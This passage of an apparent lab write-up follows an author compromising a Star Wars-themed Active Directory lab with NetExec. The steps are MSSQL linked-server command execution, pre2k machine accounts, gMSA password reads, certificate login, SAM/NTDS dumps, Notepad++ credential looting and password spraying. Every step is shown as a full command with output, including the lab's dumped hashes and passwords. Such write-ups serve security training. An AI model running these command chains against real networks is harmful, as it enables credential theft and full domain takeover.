nxc mssql 10.0.0.6 -u 'droideka' -p 'droideka' --local-auth -M link_xpcmd -o 'LINKED_SERVER=DANTOOINE\SQLEXPRESS' CMD='whoami /priv'
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [*] Running command on DANTOOINE\SQLEXPRESS: whoami /priv
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [+] Executed command via linked server
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         PRIVILEGES INFORMATION
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         ----------------------
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         Privilege Name                Description                               State
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         ============================= ========================================= ========
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeImpersonatePrivilege        Impersonate a client after authentication Enabled
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeCreateGlobalPrivilege       Create global objects                     Enabled
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

We can instead start by reading the root directory (C:/) and discover a directory called rebels_plan containing a plans.txt file, let’s check its contents:

nxc mssql 10.0.0.6 -u 'droideka' -p 'droideka' --local-auth -M link_xpcmd -o 'LINKED_SERVER=DANTOOINE\SQLEXPRESS' CMD='powershell -c cat /rebels_plan/plans.txt'
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka 
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [*] Running command on DANTOOINE\SQLEXPRESS: powershell -c cat /rebels_plan/plans.txt
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [+] Executed command via linked server
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         Our next base is located in a place called "endor", this is a top secret information !

If we remember from earlier, every machine has the name of a planet, so we can suppose that endor references another machine. More on this just after.

We can enumerate users in the other domain:

nxc mssql 10.0.0.6 -u 'droideka' -p 'droideka' --local-auth -M link_xpcmd -o 'LINKED_SERVER=DANTOOINE\SQLEXPRESS' CMD='powershell -c net users /domain'
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [*] Running command on DANTOOINE\SQLEXPRESS: powershell -c net users /domain
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [+] Executed command via linked server
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         The request will be processed at a domain controller for domain rebels.local.
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         User accounts for \\jedha.rebels.local
-------------------------------------------------------------------------------
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         administrator            baze                     biggs
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         bodhi                    cassian                  chirrut
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         ezra                     finn                     Guest
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         han                      hera                     jyn
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         krbtgt                   lando                    leia
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         luke                     maz                      mon
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         obiwan                   poe                      rey
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         sabine                   wedge
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         The command completed successfully.

With the list of users I sprayed the passwords that we have as well as username=password but nothing 😔

I was pretty stuck at this point so I asked Wilfried for a hint. He asked me if I had seen that the machines had names of planets, which I had. So endor could be another machine, and he asked me if I knew any common attacks on machines.

I immediately thought of pre2k accounts. We can try that!

Pre-Created Computer Accounts - Pre2k

I recommend reading this article by TrustedSec if you are unfamiliar with Pre-Created Computer Accounts.

Tldr

When the “Assign this computer account as a pre-Windows 2000 computer” checkbox is selected when creating a computer object, the machine’s password is set to the name of the machine in lowercase without the trailing $ character.

For example if we create a machine account FS01$ with the checkbox ticked the password would be set to fs01.

As you can see by the timestamp of the next command this is 45 minutes later, I lost a lot of time on this next stupid mistake 😆!

We can check if this account works by specifying the name of the machine account as the username and the password being the name of the machine account in lowercase without the trailing $ like so:

nxc ldap 10.0.0.7 -u ENDOR$ -p endor -d rebels.local

But it fails… I was confused at this point because I was used to seeing the STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT error message, but that message only shows if the account has not been used yet, and since I was running late someone must have beaten me to it (or the account had already logged in when the lab was set up).

Warning

Remember to specify -k for Kerberos authentication (https://x.com/filip_dragovic/status/1524730451826511872)! Thanks to Wilfried again for the hint 😉!
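As an added example (my own code, not the workshop’s or NetExec’s), here is the pre2k rule from the Tldr above as a script. It derives the default password for each computer account in a constructed list (the names follow the lab’s computer accounts, the logonCount values are invented), orders never-used accounts first, and turns the NTLM result string NetExec printed into a verdict that encodes the caveat just described: STATUS_LOGON_FAILURE over NTLM does not prove the default password is gone once the account has been used, so the candidate is re-tested with Kerberos (-k) before being discarded. The defender action for any confirmed hit is the same either way: rotate or delete the account. The logonCount ordering is my own heuristic, not something the page states.

```python
# Constructed sample: computer accounts as a defender would list them from
# LDAP. Names follow the lab; logonCount values are invented for the example.
COMPUTERS = [
    {"sAMAccountName": "jedha$", "logonCount": 412},
    {"sAMAccountName": "dantooine$", "logonCount": 97},
    {"sAMAccountName": "endor$", "logonCount": 0},
    {"sAMAccountName": "gMSA-scarif$", "logonCount": 3},
]


def pre2k_password(sam_account_name):
    """Default password set by the pre-Windows 2000 checkbox: the account
    name lower-cased, without the trailing '$' (FS01$ -> fs01)."""
    return sam_account_name.rstrip("$").lower()


def pre2k_candidates(computers):
    """Every computer account paired with its would-be default password.
    Assumption (not from the page): logonCount 0 means the account was never
    used, so those are listed first as the likeliest untouched accounts."""
    ranked = sorted(computers, key=lambda c: c["logonCount"])
    return [(c["sAMAccountName"], pre2k_password(c["sAMAccountName"])) for c in ranked]


# What an NTLM test result means, following the write-up's own experience.
NTLM_VERDICT = {
    "+": "default password accepted: rotate or delete the account",
    "STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT":
        "default password valid, account never used: rotate or delete it",
    "STATUS_LOGON_FAILURE":
        "rejected over NTLM; once the account has been used this does not rule "
        "the default password out, re-test with Kerberos (-k) before discarding",
}


def triage(computers, ntlm_results):
    """ntlm_results maps sAMAccountName -> '+' or the NTSTATUS string NetExec
    printed. Returns one (account, candidate_password, verdict) per account."""
    out = []
    for sam, pwd in pre2k_candidates(computers):
        status = ntlm_results.get(sam, "not tested")
        out.append((sam, pwd, NTLM_VERDICT.get(status, "not tested yet")))
    return out


if __name__ == "__main__":
    # Constructed result: the situation in the write-up, where endor$ had
    # already been used and NTLM reported a plain logon failure.
    for row in triage(COMPUTERS, {"endor$": "STATUS_LOGON_FAILURE"}):
        print(row)
```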

We now have an account in the rebels.local domain:

Credentials 🔑 - endor

endor$:endor


Domain 2 - rebels.local

Now that we have an account in this domain we can run the BloodHound ingestor again:

nxc ldap 10.0.0.7 -u ENDOR$ -p endor -d rebels.local -k --dns-server 10.0.0.7 --bloodhound -c all
LDAP        10.0.0.7        389    JEDHA            [*] Windows Server 2022 Build 20348 (name:JEDHA) (domain:rebels.local) (signing:None) (channel binding:Never)
LDAP        10.0.0.7        389    JEDHA            [+] rebels.local\ENDOR$:endor
LDAP        10.0.0.7        389    JEDHA            Resolved collection methods: localadmin, psremote, container, objectprops, group, rdp, dcom, session, acl, trusts
LDAP        10.0.0.7        389    JEDHA            Using kerberos auth without ccache, getting TGT
LDAP        10.0.0.7        389    JEDHA            Done in 0M 3S
LDAP        10.0.0.7        389    JEDHA            Compressing output into /root/.nxc/logs/JEDHA_10.0.0.7_2025-06-28_234649_bloodhound.zip

We can list the computers to see if there are any more pre2k accounts that are vulnerable, but nothing there…

Group Managed Service Account (gMSA)

There is an interesting computer name containing gMSA:

nxc ldap 10.0.0.7 -u ENDOR$ -p endor -d rebels.local -k --computers
LDAP        10.0.0.7        389    JEDHA            [*] Windows Server 2022 Build 20348 (name:JEDHA) (domain:rebels.local) (signing:None) (channel binding:Never)
LDAP        10.0.0.7        389    JEDHA            [+] rebels.local\ENDOR$:endor 
LDAP        10.0.0.7        389    JEDHA            [*] Total records returned: 4
LDAP        10.0.0.7        389    JEDHA            jedha$
LDAP        10.0.0.7        389    JEDHA            dantooine$
LDAP        10.0.0.7        389    JEDHA            endor$
LDAP        10.0.0.7        389    JEDHA            gMSA-scarif$

Let’s blindly try and retrieve its NT hash with the --gmsa flag as endor since time is pressing ⌛:

nxc ldap 10.0.0.7 -u ENDOR$ -p endor -d rebels.local -k --gmsa
LDAP        10.0.0.7        389    JEDHA            [*] Windows Server 2022 Build 20348 (name:JEDHA) (domain:rebels.local) (signing:None) (channel binding:Never)
LDAP        10.0.0.7        389    JEDHA            [+] rebels.local\ENDOR$:endor 
LDAP        10.0.0.7        389    JEDHA            [*] Getting GMSA Passwords
LDAP        10.0.0.7        389    JEDHA            Account: gMSA-scarif$         NTLM: 889c32ef466ff6b367cf8adf7fce539b     PrincipalsAllowedToReadPassword: ENDOR$

Surprisingly it works, but if we check BloodHound post-workshop it makes sense, since endor has ReadGMSAPassword over gMSA-scarif$ as shown below:

Credentials 🔑 - gMSA-scarif$

gMSA-scarif$:889c32ef466ff6b367cf8adf7fce539b

Enumeration as gMSA-scarif$

Time to start our enumeration again with this account:

  • BloodHound doesn’t show any interesting ACLs
  • Password spraying doesn’t yield any results
  • We do have READ access to the Destroyer_Access SMB share on DANTOOINE though:
nxc smb 10.0.0.8 -u 'gMSA-scarif$' -H 889c32ef466ff6b367cf8adf7fce539b --shares
SMB         10.0.0.8        445    DANTOOINE        [*] Windows Server 2022 Build 20348 x64 (name:DANTOOINE) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.8        445    DANTOOINE        [+] rebels.local\gMSA-scarif$:889c32ef466ff6b367cf8adf7fce539b
SMB         10.0.0.8        445    DANTOOINE        [*] Enumerated shares
SMB         10.0.0.8        445    DANTOOINE        Share           Permissions     Remark
SMB         10.0.0.8        445    DANTOOINE        -----           -----------     ------
SMB         10.0.0.8        445    DANTOOINE        ADMIN$                          Remote Admin
SMB         10.0.0.8        445    DANTOOINE        C$                              Default share
SMB         10.0.0.8        445    DANTOOINE        D$                              Default share
SMB         10.0.0.8        445    DANTOOINE        Destroyer_Access READ
SMB         10.0.0.8        445    DANTOOINE        IPC$            READ            Remote IPC
Info

I had tried to list this directory earlier as droideka through the MSSQL link, but the context xp_cmdshell runs in on DANTOOINE didn’t have the permissions:

nxc mssql 10.0.0.6 -u 'droideka' -p 'droideka' --local-auth -M link_xpcmd -o 'LINKED_SERVER=DANTOOINE\SQLEXPRESS' CMD='powershell -c ls /Destroyer_Access'
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [*] Running command on DANTOOINE\SQLEXPRESS: powershell -c ls /Destroyer_Access
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [+] Executed command via linked server
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         ls : Access to the path 'C:\Destroyer_Access' is denied.
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         At line:1 char:1
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         + ls /Destroyer_Access
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         + ~~~~~~~~~~~~~~~~~~~~
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         + CategoryInfo          : PermissionDenied: (C:\Destroyer_Access:String) [Get-ChildItem], UnauthorizedAccessExcept
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         ion
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR

Enumerating the Destroyer_Access share with spider_plus

We can enumerate and download the files with the spider_plus module:

nxc smb 10.0.0.8 -u 'gMSA-scarif$' -H 889c32ef466ff6b367cf8adf7fce539b -M spider_plus -o DOWNLOAD_FLAG=true
SMB         10.0.0.8        445    DANTOOINE        [*] Windows Server 2022 Build 20348 x64 (name:DANTOOINE) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.8        445    DANTOOINE        [+] rebels.local\gMSA-scarif$:889c32ef466ff6b367cf8adf7fce539b
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*]     STATS_FLAG: True
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*]  OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus
SMB         10.0.0.8        445    DANTOOINE        [*] Enumerated shares
SMB         10.0.0.8        445    DANTOOINE        Share           Permissions     Remark
SMB         10.0.0.8        445    DANTOOINE        -----           -----------     ------
SMB         10.0.0.8        445    DANTOOINE        ADMIN$                          Remote Admin
SMB         10.0.0.8        445    DANTOOINE        C$                              Default share
SMB         10.0.0.8        445    DANTOOINE        D$                              Default share
SMB         10.0.0.8        445    DANTOOINE        Destroyer_Access READ
SMB         10.0.0.8        445    DANTOOINE        IPC$            READ            Remote IPC
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.0.0.8.json".
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] SMB Shares:           5 (ADMIN$, C$, D$, Destroyer_Access, IPC$)
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] SMB Readable Shares:  2 (Destroyer_Access, IPC$)
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] Total folders found:  0
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] Total files found:    2
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] File size average:    1.56 KB
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] File size min:        86 B
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] File size max:        3.04 KB
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] File unique exts:     2 (txt, pfx)
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [*] Downloads successful: 2
SPIDER_PLUS 10.0.0.8        445    DANTOOINE        [+] All files processed successfully.

There are 2 files:

ls -l /root/.nxc/modules/nxc_spider_plus/10.0.0.8/Destroyer_Access
info.txt  
poe.pfx

Here is the info.txt file:

Access key for the ship ! Also, stop taking note, it can be unsafe, you never know …

The “key for the ship” refers to the PFX certificate. We can use the new PFX options that were implemented in a recent PR by @mpgn: NetExec authenticates with the certificate over Kerberos (PKINIT) and recovers the account’s NT hash along the way (the hash printed on the [+] line below is poe’s, as the NTDS dump later in this writeup confirms).

The certificate gives us administrative access to DANTOOINE as poe (note the (admin) tag), meaning we can dump the SAM database, which contains the local localadmin user:

nxc smb 10.0.0.8 -u 'poe' --pfx-cert loot/poe.pfx --sam                                                                                              
SMB         10.0.0.8        445    DANTOOINE        [*] Windows Server 2022 Build 20348 x64 (name:DANTOOINE) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.8        445    DANTOOINE        [+] rebels.local\poe:15267fa2b302e8d98d13fb36d2dbbd64 (admin)
SMB         10.0.0.8        445    DANTOOINE        [*] Dumping SAM hashes
SMB         10.0.0.8        445    DANTOOINE        localadmin:500:aad3b435b51404eeaad3b435b51404ee:36fc6efd0c21742c771ec0bfd79757de:::
SMB         10.0.0.8        445    DANTOOINE        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.0.0.8        445    DANTOOINE        DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.0.0.8        445    DANTOOINE        WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a674f72feb919a21239dc68880ffb55d:::
SMB         10.0.0.8        445    DANTOOINE        [+] Added 4 SAM hashes to the database

The info.txt also has a hint saying to “stop taking notes”. This made me think about checking the places on the machine where people leave notes behind:

  • PowerShell history
  • Recycle Bin
  • Notepad
  • Notepad++

Enumerating Notepad++ files

Info

The notepad++ module finds Notepad++ unsaved backup files (the tabs you never saved) and lists their contents.

C:\Users\localadmin\AppData\Roaming\Notepad++\backup\new 1@2025-06-24_100732 contains some credentials:

nxc smb 10.0.0.8  -u 'localadmin' -H 36fc6efd0c21742c771ec0bfd79757de --local-auth -M notepad++
SMB         10.0.0.8        445    DANTOOINE        [*] Windows Server 2022 Build 20348 x64 (name:DANTOOINE) (domain:DANTOOINE) (signing:True) (SMBv1:False) 
SMB         10.0.0.8        445    DANTOOINE        [+] DANTOOINE\localadmin:36fc6efd0c21742c771ec0bfd79757de (admin)
NOTEPAD++   10.0.0.8        445    DANTOOINE        C:\Users\localadmin\AppData\Roaming\Notepad++\backup\new 1@2025-06-24_100732
NOTEPAD++   10.0.0.8        445    DANTOOINE            credentials
NOTEPAD++   10.0.0.8        445    DANTOOINE            - wz(}ab4=/&_f
NOTEPAD++   10.0.0.8        445    DANTOOINE            - s>cwp>9c*x=s
NOTEPAD++   10.0.0.8        445    DANTOOINE        Notepad++ backup written to: /root/.nxc/modules/notepad++/10.0.0.8_localadmin_notepad_backup_1.txt

Password Spraying πŸ’¦

Let’s spray them across the users and we get a hit with obiwan:

nxc smb targets.txt -u 'users/rebels.txt' -p users/passwords.txt --continue-on-success
SMB         10.0.0.7        445    jedha            [+] rebels.local\obiwan:wz(}ab4=/&_f

Credentials πŸ”‘ - obiwan

obiwan:wz(}ab4=/&_f

Backup Operator

Another recent PR by @mpgn allows us to abuse SeBackupPrivilege (held by the Backup Operators group) to save the SAM, SYSTEM and SECURITY hives remotely. Let’s try it blindly as obiwan since I had a hunch:

nxc smb targets.txt -u 'obiwan' -p 'wz(}ab4=/&_f' -M backup_operator
SMB         10.0.0.6        445    MUSTAFAR         [*] Windows Server 2022 Build 20348 x64 (name:MUSTAFAR) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.5        445    coruscant        [*] Windows Server 2022 Build 20348 x64 (name:coruscant) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.8        445    DANTOOINE        [*] Windows Server 2022 Build 20348 x64 (name:DANTOOINE) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.7        445    jedha            [*] Windows Server 2022 Build 20348 x64 (name:jedha) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.6        445    MUSTAFAR         [-] empire.local\obiwan:wz(}ab4=/&_f STATUS_LOGON_FAILURE
SMB         10.0.0.5        445    coruscant        [-] empire.local\obiwan:wz(}ab4=/&_f STATUS_LOGON_FAILURE
SMB         10.0.0.8        445    DANTOOINE        [+] rebels.local\obiwan:wz(}ab4=/&_f
BACKUP_O... 10.0.0.8        445    DANTOOINE        [*] Triggering RemoteRegistry to start through named pipe...
SMB         10.0.0.7        445    jedha            [+] rebels.local\obiwan:wz(}ab4=/&_f
BACKUP_O... 10.0.0.7        445    jedha            [*] Triggering RemoteRegistry to start through named pipe...
BACKUP_O... 10.0.0.8        445    DANTOOINE        [-] Couldn't save HKLM\SAM: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied  on path \\10.0.0.8\SYSVOL\SAM
BACKUP_O... 10.0.0.7        445    jedha            [-] Couldn't save HKLM\SAM: RRP SessionError: code: 0xb7 - ERROR_ALREADY_EXISTS - Cannot create a file when that file already exists. on path \\10.0.0.7\SYSVOL\SAM

Unfortunately I wasn’t the first person here 😓, so my dump failed: on jedha the module writes the hives into SYSVOL and those files already existed (ERROR_ALREADY_EXISTS), and on DANTOOINE the save was refused outright.

I had to download the SAM, SYSTEM and SECURITY files that were already sitting on the SYSVOL share, then extract the secrets with secretsdump (ok, I didn’t use nxc for this part 😂).

Secretsdump

secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x0a68842a6bb2394984e82b607e3bf5e3
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6db5eb0d52b4016139ea90b2f36a652d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:0ea26d2703cc231b11c6966908a847952e50af684ccf0ee3a990fc723ad40d8b29fbed4b7b6be5f28ac8145b5f61b52e9e7837a84d0c955a4a508e2177b6d6ed943565d4937c50ec695eb9a72b0e985b8c78359a2f406700fbdc04a8ff57a60fb85b0f4ec300ffae4fc186d101850ad16c73147742139edce9e6bd2b16f8f477d2d8c6f28d2b08934c15c440cf03b4f683c5cdc72fee58b7fca8496434e85fde374e8d77e58ed0b1607a03920489084736e5a4abbdea8c00846540d0a2d306b398d65e29a5609f0a0053bbd74e59a3bffb31857f241f21ee290e79ba6cb582735ae0f47f237d93899ed192cfeb5f2e4a
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:6818e41f26d213767204815c05cece26
[*] DefaultPassword 
(Unknown User):db_yLR8;W}pl
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x9526ee65d5e6780ce9ddd7a2826f358f43f8fde0
dpapi_userkey:0xe849f9292132952a94dcef6379b33b59be9bbc3c
[*] NL$KM 
 0000   BE 05 50 1C AA F8 5E E2  FC 24 03 63 8E 41 9F 86   ..P...^..$.c.A..
 0010   22 50 C2 DB 0F FB D1 C8  3B E5 68 E1 71 AA FF 4E   "P......;.h.q..N
 0020   FE FB 9A 8C B7 AD FF 49  2A BA 71 0B A1 72 68 8D   .......I*.q..rh.
 0030   B6 E9 70 DC C5 09 EA 45  46 79 0E 37 D1 B1 DE D9   ..p....EFy.7....
NL$KM:be05501caaf85ee2fc2403638e419f862250c2db0ffbd1c83be568e171aaff4efefb9a8cb7adff492aba710ba172688db6e970dcc509ea4546790e37d1b1ded9
[*] Cleaning up...

We get the Administrator hash as well as a cleartext DefaultPassword (db_yLR8;W}pl) for an unknown user. Two sanity checks on a hive dump taken from a DC: the $MACHINE.ACC NT hash (6818e41f…) is jedha$’s machine account hash, and the Administrator entry in a DC’s SAM is the DSRM account, which in this lab has the same NT hash as the domain administrator; both are confirmed by the NTDS dump below.

Since that hash authenticates as rebels.local\administrator, we can dump NTDS directly:

nxc smb 10.0.0.7 -u 'administrator' -H '6db5eb0d52b4016139ea90b2f36a652d' --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] Y
SMB         10.0.0.7        445    jedha            [*] Windows Server 2022 Build 20348 x64 (name:jedha) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.7        445    jedha            [+] rebels.local\administrator:6db5eb0d52b4016139ea90b2f36a652d (admin)
SMB         10.0.0.7        445    jedha            [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.0.0.7        445    jedha            rebels.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:6db5eb0d52b4016139ea90b2f36a652d:::
SMB         10.0.0.7        445    jedha            Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.0.0.7        445    jedha            krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8197f5b787e8ed87845d94cae97f9758:::
SMB         10.0.0.7        445    jedha            rebels.local\luke:1106:aad3b435b51404eeaad3b435b51404ee:98fc6b0578a8d209a834b20513fe1ba3:::
SMB         10.0.0.7        445    jedha            rebels.local\leia:1107:aad3b435b51404eeaad3b435b51404ee:34feb4df76020988f933d340c04c5868:::
SMB         10.0.0.7        445    jedha            rebels.local\han:1108:aad3b435b51404eeaad3b435b51404ee:fa159092f7dc6ae78ed6496e0cec5c0d:::
SMB         10.0.0.7        445    jedha            rebels.local\obiwan:1109:aad3b435b51404eeaad3b435b51404ee:f0057beb1194995b74c28becda1ad201:::
SMB         10.0.0.7        445    jedha            rebels.local\lando:1110:aad3b435b51404eeaad3b435b51404ee:c697c8e44fc55db5f0eeb0f1de1c47f7:::
SMB         10.0.0.7        445    jedha            rebels.local\jyn:1111:aad3b435b51404eeaad3b435b51404ee:4febb45b02ee6b653a73eac892c49952:::
SMB         10.0.0.7        445    jedha            rebels.local\cassian:1112:aad3b435b51404eeaad3b435b51404ee:734bd69e2739ff552aeb26535dc1ee4c:::
SMB         10.0.0.7        445    jedha            rebels.local\finn:1113:aad3b435b51404eeaad3b435b51404ee:6bf5bfe70e178247f3d433ce3d02fae4:::
SMB         10.0.0.7        445    jedha            rebels.local\rey:1114:aad3b435b51404eeaad3b435b51404ee:dd6a2b0a07e11f04518fb7470ba10bf9:::
SMB         10.0.0.7        445    jedha            rebels.local\maz:1115:aad3b435b51404eeaad3b435b51404ee:844bfaf9557153d4969c03156bd77f25:::
SMB         10.0.0.7        445    jedha            rebels.local\poe:1116:aad3b435b51404eeaad3b435b51404ee:15267fa2b302e8d98d13fb36d2dbbd64:::
SMB         10.0.0.7        445    jedha            rebels.local\wedge:1117:aad3b435b51404eeaad3b435b51404ee:c653673f3238e496371c8fa0884c9774:::
SMB         10.0.0.7        445    jedha            rebels.local\biggs:1118:aad3b435b51404eeaad3b435b51404ee:168b115abc1c2f2892936c0ea6728de8:::
SMB         10.0.0.7        445    jedha            rebels.local\mon:1119:aad3b435b51404eeaad3b435b51404ee:2e9de0b78541e3acece4806d5feb0e96:::
SMB         10.0.0.7        445    jedha            rebels.local\bodhi:1120:aad3b435b51404eeaad3b435b51404ee:9bcbf649c669e0f24cbcb1b5ed523985:::
SMB         10.0.0.7        445    jedha            rebels.local\chirrut:1121:aad3b435b51404eeaad3b435b51404ee:071d139ac3093f5e3e7ce49b52dc8de7:::
SMB         10.0.0.7        445    jedha            rebels.local\baze:1122:aad3b435b51404eeaad3b435b51404ee:db1c9344ff30724d47becf7ac8b35932:::
SMB         10.0.0.7        445    jedha            rebels.local\hera:1123:aad3b435b51404eeaad3b435b51404ee:6782429a2408c734148d6a4ba2cf100e:::
SMB         10.0.0.7        445    jedha            rebels.local\ezra:1124:aad3b435b51404eeaad3b435b51404ee:487475c54ff573d9d7235a6f7b9c96a2:::
SMB         10.0.0.7        445    jedha            rebels.local\sabine:1125:aad3b435b51404eeaad3b435b51404ee:94f9963f53b977b90caaf40f94203168:::
SMB         10.0.0.7        445    jedha            jedha$:1000:aad3b435b51404eeaad3b435b51404ee:6818e41f26d213767204815c05cece26:::
SMB         10.0.0.7        445    jedha            DANTOOINE$:1103:aad3b435b51404eeaad3b435b51404ee:2ede1c63b1a60dce4638bc925a4d77d1:::
SMB         10.0.0.7        445    jedha            ENDOR$:1104:aad3b435b51404eeaad3b435b51404ee:e43f63b3d680076ffd8dafaae8b642c1:::
SMB         10.0.0.7        445    jedha            gMSA-scarif$:1105:aad3b435b51404eeaad3b435b51404ee:889c32ef466ff6b367cf8adf7fce539b:::
SMB         10.0.0.7        445    jedha            [+] Dumped 27 NTDS hashes to /root/.nxc/logs/ntds/jedha_10.0.0.7_2025-06-29_003209.ntds of which 23 were added to the database

Let’s create a list of all the NT hashes above (field 4 of the .ntds file), dropping disabled accounts:

cat /root/.nxc/logs/ntds/jedha_10.0.0.7_2025-06-29_003209.ntds | grep -iv disabled | cut -d ':' -f4 > users/hashes.txt
